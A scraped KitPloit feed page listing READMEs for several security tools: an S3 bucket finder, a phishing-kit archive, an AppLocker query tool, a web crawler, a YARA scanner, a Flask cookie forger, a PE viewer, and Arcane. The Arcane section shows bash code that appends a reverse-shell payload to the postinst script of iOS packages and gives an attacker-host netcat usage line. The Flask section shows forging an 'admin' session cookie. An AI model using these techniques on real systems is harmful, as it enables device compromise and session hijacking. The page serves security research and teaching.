Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

FestIn - S3 Bucket Weakness Discovery

$
0
0

FestIn is a tool for discovering open S3 Buckets starting from a domains.
It perform a lot of test and collects information from:
  • DNS
  • Web Pages (Crawler)
  • S3 bucket itself (like S3 redirections)

Why Festin
There's a lot of S3 tools for enumeration and discover S3 bucket. Some of them are great but anyone have a complete list of features that Festin has.
Main features that does Festin great:
  • Various techniques for finding buckets: crawling, dns crawling and S3 responses analysis.
  • Proxy support for tunneling requests.
  • AWS credentials are not needed.
  • Works with any S3 compatible provider, not only with AWS.
  • Allows to configure custom DNS servers.
  • Integrated high performanceHTTP crawler.
  • Recursively search and feedback from the 3 engines: a domain found by dns crawler is send to S3 and Http Crawlers analyzer and the same for the S3 and Crawler.
  • Works as 'watching' mode, listening for new domains in real time.
  • Save all of the domains discovered in a separate file for further analysis.
  • Allow to download bucket objects and put then in a FullText Search Engine (Redis Search) automatically, indexing the objects content allowing powerful search further.
  • Limit the search for specific domain/s.

Install

Using Python
Python 3.8 of above needed!
$ pip install festin
$ festin -h

Using Docker
$ docker run --rm -it cr0hn/festin -h

Full options
$ festin -h
usage: __main__.py [-h] [--version] [-f FILE_DOMAINS] [-w] [-c CONCURRENCY] [--no-links] [-T HTTP_TIMEOUT] [-M HTTP_MAX_RECURSION] [-dr DOMAIN_REGEX] [-rr RESULT_FILE] [-rd DISCOVERED_DOMAINS] [-ra RAW_DISCOVERED_DOMAINS]
[--tor] [--debug] [--no-print] [-q] [--index] [--index-server INDEX_SERVER] [-dn] [-ds DNS_RESOLVER]
[domains [domains ...]]

Festin - the powered S3 bucket finder and content discover

positional arguments:
domains

optional arguments:
-h, --help show this help message and exit
--version show version
-f FILE_DOMAINS, --file-domains FILE_DOMAINS
file with domains
-w, --watch watch for new domains in file domains '-f' option
-c CONCURRENCY, --concurrency CONCURRENCY
max concurrency

HTTP Probes:
--no-links extract web s ite links
-T HTTP_TIMEOUT, --http-timeout HTTP_TIMEOUT
set timeout for http connections
-M HTTP_MAX_RECURSION, --http-max-recursion HTTP_MAX_RECURSION
maximum recursison when follow links
-dr DOMAIN_REGEX, --domain-regex DOMAIN_REGEX
only follow domains that matches this regex

Results:
-rr RESULT_FILE, --result-file RESULT_FILE
results file
-rd DISCOVERED_DOMAINS, --discovered-domains DISCOVERED_DOMAINS
file name for storing new discovered after apply filters
-ra RAW_DISCOVERED_DOMAINS, --raw-discovered-domains RAW_DISCOVERED_DOMAINS
file name for storing any domain without filters

Connectivity:
--tor Use Tor as proxy

Display options:
--debug enable debug mode
--no-print doesn't print results in sc reen
-q, --quiet Use quiet mode

Redis Search:
--index Download and index documents into Redis
--index-server INDEX_SERVER
Redis Search ServerDefault: redis://localhost:6379

DNS options:
-dn, --no-dnsdiscover
not follow dns cnames
-ds DNS_RESOLVER, --dns-resolver DNS_RESOLVER
comma separated custom domain name servers

Usage

Configure search domains
By default FestIn accepts a start domain as command line parameter:
> festin mydomain.com
But you also cat setup an external file with a list of domains:
> cat domains.txt
domain1.com
domain2.com
domain3.com
> festin -f domains.txt

Concurrency
FestIn performs a lot of test for a domain. Each test was made concurrently. By default concurrency is set to 5. If you want to increase the number of concurrency tests you must set the option -c
> festin -c 10 mydomain.com 
Be carefull with the number of concurrency test or "alarms" could raises in some web sites.

HTTP Crawling configuration
FestIn embed a small crawler to discover links to S3 buckets. Crawler accepts these options:
  • Timeout (-T or --http-timeout): configure a timeout for HTTP connections. If website of the domain you want to analyze is slow, we recommend to increase this value. By default timeout is 5 seconds.
  • Maximum recursion (-H or --http-max-recursion): this value setup a limit for crawling recursion. Otherwise FestIn will scan all internet. By default this value is 3. It means that only will follow: domain1.com -> [link] -> domain2.com -> [link] -> domain3.com -> [link] -> Maximum recursion reached. Stop
  • Limit domains (-dr or --domain-regex): set this option to limit crawler to these domains that matches with this regex.
Example:
> festin -T 20 -H 8 -dr *mydomain* mydomain.com 

Manage results
When FestIn runs it discover a lot of useful information. Not only about S3 buckets, also for other probes we could do. For example:
After we use FestIn we can use discovered information (domains, links, resources, other buckets...) as input of other tools, like nmap.
For above reason FestIn has 3 different modes to store discovered information and we can combine them:
  • FestIn result file (-rr or --result-file): this file contains one JSON per line with buckets found by them. Each JSON includes: origin domain, bucket name and the list of objects for the bucket.
  • Filtered discovered domains file (-rd or --discovered-domains): this file contains one domain per line. These domains are discovered by the crawler, dns or S3 probes but only are stored these domains that matches with user and internal filters.
  • Raw discovered domains file (-ra or --raw-discovered-domains ): this file contains all domains, one per line, discovered by FestIn without any filter. This option is useful for post-processing and analyzing.
Example:
> festin -rr festin.results -rd discovered-domains.txt -ra raw-domains.txt mydomain.txt 
And, chaining with Nmap:
> festin -rd domains.txt && nmap -Pn -A -iL domains.txt -oN nmap-domains.txt 

Proxy usage
FestIn embeds the option --tor. By using this parameter you need local Tor proxy running at port 9050 at 127.0.0.1.
> tor &
> festin --tor mydomain.com

DNS Options
Some tests made by FestIn involves DNS. It support these options:
  • Disable DNS discovery (-dn or --no-dnsdiscover)
  • Custom DNS server (-ds or --dns-resolver): setup custom DNS server. If you plan to perform a lot of tests you should use a different DNS server like you use to your browser.
Example:
> festin -ds 8.8.8.8 mydomain.com 

Full Text Support
FestIn not only can discover open S3 buckets. It also can download all content and store them in a Full Text Search Engine. This means that you can perform Full Text Queries to the content of the bucket!
FestIn uses as Full Text Engine the Open Source project Redis Search.
This feature has two options:
  • Enable indexing (--index): to enable the indexing to the search engine you must setup this flag.
  • Redis Search config (--index-server): you only need to setup this option if your server is running in a different IP/Port that: localhost:6379.
Example:
> docker run --rm -p 6700:6379 redislabs/redisearch:latest -d
> festin --index --index-server redis://127.0.0.1:6700 mydomain.com
Pay attention to option `--index-server` is must has the prefix **redis://** 

Running as a service (or watching mode)
Some times we don't want to stop FestIn and launch them some times when we have a new domain to inspect or any external tool discovered new domains we want to check.
FestIn supports watching mode. This means that FestIn will start and listen for new domains. The way to "send" new domains to FestIn is by domains file. It monitor this file for changes.
This feature is useful to combine FestIn with other tools, like dnsrecon
Example:
> festin --watch -f domains.txt 
In a different terminal we can write:
> echo "my-second-domain.com" >> domains.txt 
> echo "another-domain.com" >> domains.txt
Each new domain added to domains.txt will wakeup FestIn.

Example: Mixing FesTin + DnsRecon
Using DnsRecon
The domain chosen for this example is target.com.

Step 1 - Run dnsrecon with desired options against target domain and save the output
>  dnsrecon -d target.com -t crt -c target.com.csv
With this command we are going to find out other domains related to target.com. This will help to maximize our chances of success.

Step 2 - Prepare the previous generated file to feed FestIn
> tail -n +2 target.com.csv | sort -u | cut -d "," -f 2 >> target.com.domains
With this command we generate a file with one domain per line. This is the input that FestIn needs.

Step 3 - Run FestIn with desired options and save output
>  festin -f target.com.domains -c 5 -rr target.com.result.json --tor -ds 212.166.64.1 >target.com.stdout 2>target.com.stderr
In this example the resulting files are:
  • target.com.result.json - Main result file with one line per bucket found. Each line is a JSON object.
  • target.com.stdout - The standard output of festin command execution
  • target.com.stderr - The standard error of festin command execution
In order to easy the processing of multiple domains, we provide a simple script examples/loop.sh that automatize this.
Using FestIn with DnsRecon results
Run against target.com with default options and leaving result to target.com.result file:
> festin target.com -rr target.com.result.json 

Run against target.com using tor proxy, with concurrency of 5, using DNS 212.166.64.1 for resolving CNAMEs and leaving result to target.com.result file:
> festin target.com -c 5 -rr target.com.result.json --tor -ds 212.166.64.1 

F.A.Q.
Q: AWS bans my IP A:
When you perform a lot of test against AWS S3, AWS includes your IP in a black list. Then each time you want to access to any S3 bucket with FestIn of with your browser will be blocked.
We recommend to setup a proxy when you use FestIn.

Who uses FestIn

MrLooquer
They analyze and assess your company risk exposure in real time. Website



PhishingKitTracker - Let's Track Phishing Kits To Give To Research Community Raw Material To Stud

$
0
0

An extensible and freshly updated collection of phishingkits for forensics and future analysis topped with simple stats

Disclaimer
This repository holds a collection of Phishing Kits used by criminals to steal user information. Almost every file into the raw folder is malicious so I strongly recommend you to neither open these files, nor misuse the code to prank your friends. Playing with these kits may lead to irreversible consequences which may affect anything from personal data to passwords and banking information.
I am not responsible for any damage caused by the malware inside my repository and your negligence in general.

NB: Large File System Hahead
PhishingKitTracker is stored into Git Large File System (git-lfs) due to the big amount of data tracked. You should install git-lfs before cloning this repository.

RAW Data
In raw folder are tracked the Phishing Kits in the original format. No manipulation are involved in that data. A backend script goes over malicious harvested websites (harvesting from common sources) and checks if Phishing Kits are in there. In a positive case (if a PhishingKit is found) the resulting file is downloaded and instantly added to that folder. This folder is tracked by using Git Large File System since many files are bigger than 100MB. The "RAW Data" is a quite unexplored land, you would find many interesting topics with high probability. Please remember to cite that work if you find something from here, it would be very appreciated.

STATS
In stats folder are maintained two up-to-date files:
  1. files_name it holds the frequency of the found file-names associate with kits. In other words every phishing kit is saved on the phishing host with a name. filke_name keeps track about every file names and its frequency. If you are wondering why am I not tracking hashes, is because phishing kits are big compressed archives, so it would make no sense at this stage since they always differ each other (but check in src folder for additional information)
  2. sites hols the frequency of the hosting domain names. In other words where the phishing kit was found. No duplicates are tracked by meaning that the frequency and the file names are unique. So for example if you see something like: 3 li.humanbiomics-project.org it means that in li.humanbiomics-project.org have been found three different Phishing Kits over time. Both of these files have been generate by simple bash scripts like:
  • ls raw/ | cut -d'_' -f1 | uniq -c | sort -bgr > stats/sites.txt
  • ls raw/ | cut -d'_' -f2 | uniq -c | sort -bgr > stats/files_name.txt
these scripts are run on every commit making files inline with the raw folder.
On the other side a file called similarity.csv is provided with a tremendous delay due to the vast amount of time in generating it. That file provides the similarity between the tracked Phishing Kits. It's a simple CSV file so that you can import it on your favorite spreadsheet and make graphs, statistics or manipulate it in the way you prefer.

SIMILARITY.CSV structure
The similarity structure is like the following one: FileA,FileB,SimilarityAVG,SimilarityMin,SimilarityMax where:
  • FileA is PhishingKit which is considered in that analysis.
  • FileB is the PhishingKit to be compared to PhishingKit FileA
  • SimilarityAVG is the Average in similarity. That average is calculated by computing the similarity check to every single (interesting) file in the PhishingKit archive (FileA) to every single (interesting) file in the PhishingKit archive to be compared (FileB)
  • SimilarityMin is the lowest similarity value found between PhishingKitA and PhishingKitB
  • SimilarityMax is the highest similarity value found between PhishingKitA and PhishingKitB
If you want to generate similarity.csv by your own I provide a simple and dirty script into the src folder. So far it has several limitations (for example it computes ZIP only files). please make pull requests for improving and empower it. Each contribute would be very helpful.

SRC
Please check those variables (compute_similarity.py) and change them at your will.
EXTENSION_FOR_ANALYSIS = ['.html','.js','.vbs','.xls','.xlsm','.doc','.docm', '.ps1']
OUTPUT_FILE = 'similarity.csv'
RAW_FOLDER = '/tmp/raw/'
TEMP_FOLDER = '/tmp/tt'
Once you've changed them you can run the script and take a long rest. It will navigate through the RAW_FOLDER, grab the .zip files and tries to compute code similarity between them. At the very end it will save results into OUTPUT_FILE. From now you can import such a a file into your favorite spreadsheet processor and elaborate the code similarity.
So far the python script is able to only compare zip tracked phishingkit, for different compressed format it's still work in progress.
NB: The Python script is in a super early stage of development. Please help to improve it.

How to contribute
Introducing the walking script for different compression formats. In other words if you want to contribute you can write a new section such as the following one (code_similarity.py) but for different compression extensions such as: .tar.gz, .tar, .rar. /7z and so on and so forth.
# Extracts Zip files based on EXTENSION_FOR_ANALYSIS. It returns the etire file
# path for future works
def extractZipAndReturnsIntereistingFiles(file_to_extract):
interesting_files = []
n_interesting_files = []
try:
with ZipFile(file_to_extract, 'r') as zipObj:
listOfFileNames = zipObj.namelist()
for fileName in listOfFileNames:
for ext in EXTENSION_FOR_ANALYSIS:
if fileName.endswith(ext):
try:
zipObj.extract(fileName, TEMP_FOLDER)
interesting_files.append(os.path.join(TEMP_FOLDER, fileName))
except Exception as e:
continue
else:
n_interesting_files.append(os.path.join(TEMP_FOLDER, fileName))
except Exception as e :
return intere sting_files
return interesting_files
One more way to contribute is to make the comparison loop smarter and quicker. You might decide to parallelized task by forking and spawning more process or by changing the way I use multi-threading in this quick and dirty statistic script. In conclusion every working pull is welcomed.

Cite The Work
@misc{ MR,
author = "Marco Ramilli",
title = "Phishing Kits Tracker",
year = "2020",
url = "https://marcoramilli.com/2020/07/13/introducing-phishingkittracker/",
note = "[Online; July 2020]"
}

Credits
  • Alen Pavlovic for the amazing image that I borrowed from here
  • agarwalkeshav8399 for code similarity algorithms from here


SharpAppLocker - C# Port Of The Get-AppLockerPolicy PS Cmdlet

$
0
0

C# port of the Get-AppLockerPolicy PS cmdlet

 _____ _                       ___              _                _
/ ___| | / _ \ | | | |
\ `--.| |__ __ _ _ __ _ __ / /_\ \_ __ _ __ | | ___ ___| | _____ _ __
`--. \ '_ \ / _` | '__| '_ \| _ | '_ \| '_ \| | / _ \ / __| |/ / _ \ '__|
/\__/ / | | | (_| | | | |_) | | | | |_) | |_) | |___| (_) | (__| < __/ |
\____/|_| |_|\__,_|_| | .__/\_| |_/ .__/| .__/\_____/\___/ \___|_|\_\___|_|
| | | | | |
|_| |_| |_|



V1.0.0 - by Flangvik & Jean_Maes_1994


Usage:
-h, -?, --help Show Help

-l, --local Queries local applocker config

-d, --domain Queries domain applocker config (needs an ldap
path)

-e, --effective Queries the effective applocker config on this
computer

-x, --xml output applocker in XML format (default is json)

--ldap=VALUE the ldap filter to query the domain policy from

for detailed information please take a look at the MSDN url: https://docs.microsoft.com/en-us/powershell/module/applocker/get-applockerpolicy?view=win10-ps


Evine - Interactive CLI Web Crawler

$
0
0

Evine is a simple, fast, and interactive web crawler and web scraper written in Golang. Evine is useful for a wide range of purposes such as metadata and data extraction, data mining, reconnaissance and testing.


Follow the project on Twitter.

Install

From Binary
Pre-build binary releases are also available.

From source
go get github.com/saeeddhqan/evine
"$GOPATH/bin/evine" -h

From GitHub
git clone https://github.com/saeeddhqan/evine.git
cd evine
go build .
mv evine /usr/local/bin
evine --help
Note: golang 1.13.x required.

Commands & Usage
KeybindingDescription
EnterRun crawler (from URL view)
EnterDisplay response (from Keys and Regex views)
TabNext view
Ctrl+SpaceRun crawler
Ctrl+SSave response
Ctrl+ZQuit
Ctrl+RRestore to default values (from Options and Headers views)
Ctrl+QClose response save view (from Save view)
evine -h
It will displays help for the tool:
flagDescriptionExample
-urlURL to crawl forevine -url toscrape.com
-url-exclude stringExclude URLs maching with this regex (default ".*")evine -url-exclude ?id=
-domain-exclude stringExclude in-scope domains to crawl. Separate with comma. default=root domainevine -domain-exclude host1.tld,host2.tld
-code-exclude stringExclude HTTP status code with these codes. Separate whit '|' (default ".*")evine -code-exclude 200,201
-delay intSleep between each request(Millisecond)evine -delay 300
-depthScraper depth search level (default 1)evine -depth 2
-thread intThe number of concurrent goroutines for resolving (default 5)evine -thread 10
-headerHTTP Header for each request(It should to separated fields by \n).evine -header KEY: VALUE\nKEY1: VALUE1
-proxy stringProxy by scheme://ip:portevine -proxy http://1.1.1.1:8080
-scheme stringSet the scheme for the requests (default "https")evine -scheme http
-timeout intSeconds to wait before timing out (default 10)evine -timeout 15
-keys stringWhat do you want? write here(email,url,query_urls,all_urls,phone,media,css,script,cdn,comment,dns,network,all, or a file extension)evine -keys urls,pdf,txt
-regex stringSearch the Regular Expression on the page contentsevine -regex 'User.+'
-max-regex intMax result of regex search for regex field (default 1000)evine -max-regex -1
-robotsScrape robots.txt for URLs and using them as seedsevine -robots
-sitemapScrape sitemap.xml for URLs and using them as seedsevine -sitemap

VIEWS
  • URL: In this view, you should enter the URL string.
  • Options: This view is for setting options.
  • Headers: This view is for setting the HTTP Headers.
  • Keys: This view is used after the crawling web. It will be used to extract the data(docs, URLs, etc) from the web pages that have been crawled.
  • Regex: This view is useful to search the Regexes in web pages that have been crawled. Write your Regex in this view and press Enter.
  • Response: All of the results write in this view
  • Search: This view is used to search the Regexes in the Response content.

TODO
  • Archive crawler as seeds
  • JSON output

Bugs or Suggestions
Bugs or suggestions? Create an issue.
evine is heavily inspired by wuzz.


IRFuzz - Simple Scanner with Yara Rule

$
0
0

IRFuzz is a simple scanner with yara rules for document archives or any files.

Install

1. Prerequisites
Linux or OS X
  • Yara: just use the latest release source code, compile and install it (or install it via pip install yara-python)
  • Yara Rules - You may download yara rules from here or import your own custom ruleset.
  • Python dependencies
Dependencies are managed with pipenv. To get started install dependencies and activate virtual environment with following commands:
$ pipenv install
$ pipenv shell

Running IRFuzz
$ python -m watchd.watch ~/tools/IR/ -y rules/maldocs --csv csvfile.csv

Supported Features
  • Scans new files with inotify
  • Polling if inotify is not supported
  • Custom extensions are supported
  • Delete mode will delete matched file
  • Recursive directory scan
  • Lists matched Yara functions with yarastrings with ctime
  • CSV results for Filebeat

Custom extensions
$ python -m watchd.watch ~/tools/IR/ -y rules/maldocs --csv csvfile.csv --extensions .zip,.rar

Alert matching yara rule
Generate token from https://irfuzz.com/tokens
$ python -m watchd.watch ~/tools/IR/ -y rules/maldocs --csv csvfile.csv --extensions .php --token tokenhere
Configure alerts from the website to Telegram or your email.

Delete matched file
$ python -m watchd.watch ~/tools/IR/ -y rules/maldocs --csv csvfile.csv --delete

Polling (inotify not supported)
$ python -m watchd.watch ~/tools/IR/ -y rules/maldocs --csv csvfile.csv --polling
Adds --poll option to force the use of polling mechanism to detect changes in data directory. Polling is slower than the underlying mechanism in OS to detect changes but it's necessary with certain file systems such as SMB mounts.

Default extensions if no extensions are mentioned.

Microsoft Office Word supported file formats
.doc .docm .docx .docx .dot .dotm .dotx .odt

Microsoft Office Excel supported file formats
.ods .xla .xlam .xls .xls .xlsb .xlsm .xlsx .xlsx .xlt .xltm .xltx .xlw

Microsoft Office PowerPoint supported file formats
.pot .potm .potx .ppa .ppam .pps .ppsm .ppsx .ppt .pptm .pptx .pptx .pptx

zipdump.py
IRFuzz uses zipdump.py for zip file analysis.


Arcane - A Simple Script Designed To Backdoor iOS Packages (Iphone-Arm) And Create The Necessary Resources For APT Repositories

$
0
0

Arcane is a simple script designed to backdoor iOS packages (iphone-arm) and create the necessar y resources for APT repositories. It was created for this publication to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.

How Arcane works...
To understand what's happening in the GIF, decompress a package created with Arcane.
dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp
Notice the control and postinst files in the DEBIAN directory. Both files are important.
tree /tmp/whois-decomp/

/tmp/whois-decomp/
├── DEBIAN
│ ├── control
│ └── postinst
└── usr
└── bin
└── whois
It's possible to supply scripts as part of a package when installing or removing applications. Package maintainer scripts include the preinst, postinst, prerm, and postrm files. Arcane takes advantage of the postinst file to execute commands during the installation.
# The "post-installation" file. This file is generally responsible
# for executing commands on the OS after installing the required
# files. It's utilized by developers to manage and maintain various
# aspects of an installation. Arcane abuses this functionality by
# appending malicious Bash commands to the file.
postinst="$tmp/DEBIAN/postinst";

# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor ()
{
# If --file is used, `cat` the command(s) into the postinst file.
if [[ "$infile" ]]; then
cat "$infile" >> "$postinst";
embed="[$infile]";
else
# If no --file, utilize the simple Bash payload, previously
# defined.
echo -e "$payload" >> "$postinst";
embed="generic shell command";
fi;
status "embedded $embed into postinst" "error embedding backdoor" ;
chmod 0755 "$postinst"
};
The control file contains values that package management tools use when installing packages. Arcane will either modify an existing control or create it.
# The "control" file template. Most iOS packages will include a
# control file. In the event one is not found, Arcane will use the
# below template. The `$hacker` variable is used here to occupy
# various arbitrary fields.
# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp="Package: com.$hacker.backdoor
Name: $hacker backdoor
Version: 1337
Section: app
Architecture: iphoneos-arm
Description: A backdoored iOS package
Author: $hacker <https://$hacker.github.io/>
Maintainer: $hacker <https://$hacker.github.io/>";

...

# An `if` statement to check for the control file.
if [[ ! -f "$tmp/DEBIAN/control" ]]; then
# If no control is detected, create it using the template.
echo "$controlTemp" > "$tmp/DEBIAN/control";
status "created control file" "error with control template";
else
# If a control file exists, Arcane will simply rename t he package
# as it appears in the list of available Cydia applications. This
# makes the package easier to location in Cydia.
msg "detected control file" succ;
sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control";
status "modified control file" "error with control";
fi;

Usage
Clone the repository in Kali v2020.3.
sudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependencies
sudo git clone https://github.com/tokyoneon/arcane /opt/arcane
sudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcane
chmod +x arcane.sh;./arcane.sh --help
Embed a command into a given package. See article for more info.
./arcane.sh --input samples/sed_4.5-1_iphoneos-arm.deb --lhost <attacker> --lport <4444> --cydia --netcat

Package samples
The repo includes packages for testing.
ls -la samples/

-rw-r--r-- 1 root root 100748 Jul 17 18:39 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 142520 Jul 22 06:21 network-cmds_543-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 76688 Aug 29 2018 sed_4.5-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 60866 Jul 8 21:03 top_39-2_iphoneos-arm.deb
-rw-r--r-- 1 root root 13810 Aug 29 2018 whois_5.3.2-1_iphoneos-arm.deb
MD5 sums, as found on the official Bingner repository.
md5sum samples/*.deb

3f1712964701580b3f018305a55e217c samples/libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
795ccf9c6d53dd60d2f74f7a601f474f samples/network-cmds_543-1_iphoneos-arm.deb
a020882dac121afa4b03c63304d729b0 samples/sed_4.5-1_iphoneos-arm.deb
38db275007a331e7ff8899ea22261dc7 samples/top_39-2_iphoneos-arm.deb
b40ee800b72bbac323568b36ad67bb16 samples/whois_5.3.2-1_iphoneos-arm.deb


Flask-Session-Cookie-Manager - Flask Session Cookie Decoder/Encoder

$
0
0

 Flask Session Cookie Decoder/Encoder

Depencencies

Installation

BlackArch Linux
# pacman -S flask-session-cookie-manager{3,2}

Git

ArchLinux
Both python3 etn python2:
$ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager
# makepkg -sic

Other distros
Find your way with your package manager, use pip in a virtual environment or use pyenv.
Eg.
$ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager
$ python -m venv venv
$ source venv/bin/activate
$ python setup.py install

Usage
Use flask_session_cookie_manager3.py with Python 3 and flask_session_cookie_manager2.py with Python 2.
usage: flask_session_cookie_manager{2,3}.py [-h] {encode,decode} ...

Flask Session Cookie Decoder/Encoder

positional arguments:
{encode,decode} sub-command help
encode encode
decode decode

optional arguments:
-h, --help show this help message and exit

Encode
usage: flask_session_cookie_manager{2,3}.py encode [-h] -s <string> -t <string>

optional arguments:
-h, --help show this help message and exit
-s <string>, --secret-key <string>
Secret key
-t <string>, --cookie-structure <string>
Session cookie structure

Decode
usage: flask_session_cookie_manager.py decode [-h] [-s <string>] -c <string>

optional arguments:
-h, --help show this help message and exit
-s <string>, --secret-key <string>
Secret key
-c <string>, --cookie-value <string>
Session cookie value

Examples

Encode
$ python{2,3} flask_session_cookie_manager{2,3}.py encode -s '.{y]tR&sp&77RdO~u3@XAh#TalD@Oh~yOF_51H(QV};K|ghT^d' -t '{"number":"326410031505","username":"admin"}'
eyJudW1iZXIiOnsiIGIiOiJNekkyTkRFd01ETXhOVEExIn0sInVzZXJuYW1lIjp7IiBiIjoiWVdSdGFXND0ifX0.DE2iRA.ig5KSlnmsDH4uhDpmsFRPupB5Vw
Note: the session cookie structure must be a valid python dictionary

Decode
With secret key:
$ python{2,3} flask_session_cookie_manager{2,3}.py decode -c 'eyJudW1iZXIiOnsiIGIiOiJNekkyTkRFd01ETXhOVEExIn0sInVzZXJuYW1lIjp7IiBiIjoiWVdSdGFXND0ifX0.DE2iRA.ig5KSlnmsDH4uhDpmsFRPupB5Vw' -s '.{y]tR&sp&77RdO~u3@XAh#TalD@Oh~yOF_51H(QV};K|ghT^d'
{u'username': 'admin', u'number': '326410031505'}
Without secret key (less pretty output):
$ python{2,3} flask_session_cookie_manager{2,3}.py decode -c 'eyJudW1iZXIiOnsiIGIiOiJNekkyTkRFd01ETXhOVEExIn0sInVzZXJuYW1lIjp7IiBiIjoiWVdSdGFXND0ifX0.DE2iRA.ig5KSlnmsDH4uhDpmsFRPupB5Vw'
{"number":{" b":"MzI2NDEwMDMxNTA1"},"username":{" b":"YWRtaW4="}}

Original author : Wilson Sumanang
Fixes and improvements author : Alexandre ZANNI
Imported from saruberoz.github.io


PE Tree - Python Module For Viewing Portable Executable (PE) Files In A Tree-View

$
0
0

Python module for viewing Portable Executable (PE) files in a tree-view using pefile and PyQt5. Can also be used with IDA Pro to dump in-memory PE files and reconstruct imports.

Features
  • Standalone application and IDAPython plugin
  • Supports Windows/Linux/Mac
  • Rainbow PE ratio map:
    • High-level overview of PE structures, size and file location
    • Allows for fast visual comparison of PE samples
  • Displays the following PE headers in a tree view:
    • MZ header
    • DOS stub
    • Rich headers
    • NT/File/Optional headers
    • Data directories
    • Sections
    • Imports
    • Exports
    • Debug information
    • Load config
    • TLS
    • Resources
    • Version information
    • Certificates
    • Overlay
  • Extract and save data from:
    • DOS stub
    • Sections
    • Resources
    • Certificates
    • Overlay
  • Send data to CyberChef
  • VirusTotal search of:
    • File hashes
    • PDB path
    • Timestamps
    • Section hash/name
    • Import hash/name
    • Export name
    • Resource hash
    • Certificate serial
  • Standalone application;
    • Double-click VA/RVA to disassemble with capstone
    • Hex-dump data
  • IDAPython plugin:
    • Easy navigation of PE file structures
    • Double-click VA/RVA to view in IDA-view/hex-view
    • Search IDB for in-memory PE files;
      • Reconstruct imports (IAT + IDT)
      • Dump reconstructed PE files
      • Automatically comment PE file structures in IDB
      • Automatically label IAT offsets in IDB

Application

Requirements
  • Python 3+

Installation

Using pip (recommended)
Install directly from GitHub using a fresh virtual environment and pip:

Windows
> virtualenv env
> env\Scripts\activate
> pip install --upgrade pip
> pip install git+https://github.com/blackberry/pe_tree.git

Mac/Linux
$ python3 -m venv env
$ source ./env/bin/activate
$ pip install --upgrade pip
$ pip install git+https://github.com/blackberry/pe_tree.git

For developers
Git clone the repository and setup for development:

Windows
> git clone https://github.com/blackberry/pe_tree.git
> cd pe_tree
> virtualenv env
> env\Scripts\activate
> pip install -e .

Mac/Linux
$ git clone https://github.com/blackberry/pe_tree.git
$ cd pe_tree
$ python3 -m venv env
$ source ./env/bin/activate
$ pip install -e .

Usage
Run PE Tree and use the GUI to select a file to view:
$ pe-tree
Run PE Tree and view the specified file/folder:
$ pe-tree <path>

Dark-mode
Dark-mode can be enabled by installing QDarkStyle:
$ pip install qdarkstyle

IDAPython


Requirements
  • IDA Pro 7.0+ with Python 2.7
  • IDA Pro 7.4+ with Python 2.7 or 3.x

Installation
To install and run as an IDAPython plugin you can either use setuptools or install manually.

Using setuptools
  1. Download pe_tree and install for the global Python interpreter used by IDA:
    $ git clone https://github.com/blackberry/pe_tree.git
    $ cd pe_tree
    $ python setup.py develop --ida
  2. Copy pe_tree_ida.py to your IDA plugins folder

Install manually
  1. Download pe_tree and install requirements for the global Python interpreter used by IDA:
    $ git clone https://github.com/blackberry/pe_tree.git
    $ cd pe_tree
    $ pip install -r requirements.txt
  2. Copy pe_tree_ida.py and the contents of ./pe_tree/ to your IDA plugins folder

For developers
To simply run as a script under IDA first install the pe_tree package requirements for the global Python installation:
$ pip install -r requirements.txt
Then run pe_tree_ida.py under IDA:
File -> Script file... -> pe_tree_ida.py -> Open

IDA plugins folder
OSPlugins folder
Windows%ProgramFiles%\IDA Pro 7.X\plugins
Linux/opt/ida-7.X/plugins
Mac~/.idapro/plugins

Usage
  1. Run IDA and disassemble a PE file (select Manual Load and Load Resources for best results!)
  2. Click Edit -> Plugins -> PE Tree

Examples

Dumping in-memory PE files
Below are the basic steps to dump a packed PE file (for example MPRESS or UPX) and rebuild imports (assuming the image base/entry-point is fairly standard):
  1. Launch IDA Pro and disassemble an MPRESS or UPX packed PE file (select Manual Load and Load Resources)
  2. Select debugger (Windows or Bochs) and run until OEP (usually 0x00401000)
  3. At this point you could take a memory snapshot (saving all segments) and save the IDB for later
  4. Ensure IDA has found all code Options -> General -> Analysis -> Reanalyze program
  5. Open PE Tree, right-click and choose Add PE -> Search IDB
  6. Right click on HEADER-0x00400000 (or appropriate module) and select Dump...
  7. Specify the AddressOfEntryPoint (typically 0x1000)
  8. Ensure Rebuild imports is selected
  9. Dump!
A new executable will be created using the unpacked section data obtained from memory/IDB, and a new section named .idata containing the rebuilt IAT, hint name table and IDT will be appended to the PE file. If the entry-point memory segment has been marked writable during execution (via VirtualProtect for example) then the EP section characteristics will also be marked writable. Finally, the BASERELOC, BOUND_IMPORT and SECURITY data directories are marked null, and the OPTIONAL_HEADER checksum is recalculated (if enabled via config)
Using the above approach it is possible to dump many in-memory PE files that have either been unpacked, remotely injected, reflectively loaded or hollowed etc.

Configuration

Overview
The configuration is stored in an INI file and defaults to the following values:
[config]
debug = False
fonts = Consolas,Monospace,Courier
virustotal_url = https://www.virustotal.com/gui/search
cyberchef_url = https://gchq.github.io/CyberChef

[dump]
enable = True
recalculate_pe_checksum = False

Options
SectionOptionTypeDescription
configdebugbooleanPrint pefile.dump() to output
configfontsstringComma-separated list of font names for UI
configvirustotal_urlstringVirusTotal search URL
configcyberchef_urlstringCyberChef URL
dumpenablebooleanEnable process dumping/IAT rebuilding in IDA
dumprecalculate_pe_checksumbooleanRecalculate PE header checksum (slow!)

Location
TypeOSPath
ApplicationWindows%TEMP%\pe_tree.ini
ApplicationLinux/Mac/tmp/pe_tree.ini
IDAPythonWindows%APPDATA%\HexRays\IDA Pro\pe_tree.ini
IDAPythonLinux/Mac~/.idapro/pe_tree.ini

3rd party data sharing
The following information will be shared with 3rd party web-applications (depending on configuration) under the following conditions:

VirusTotal
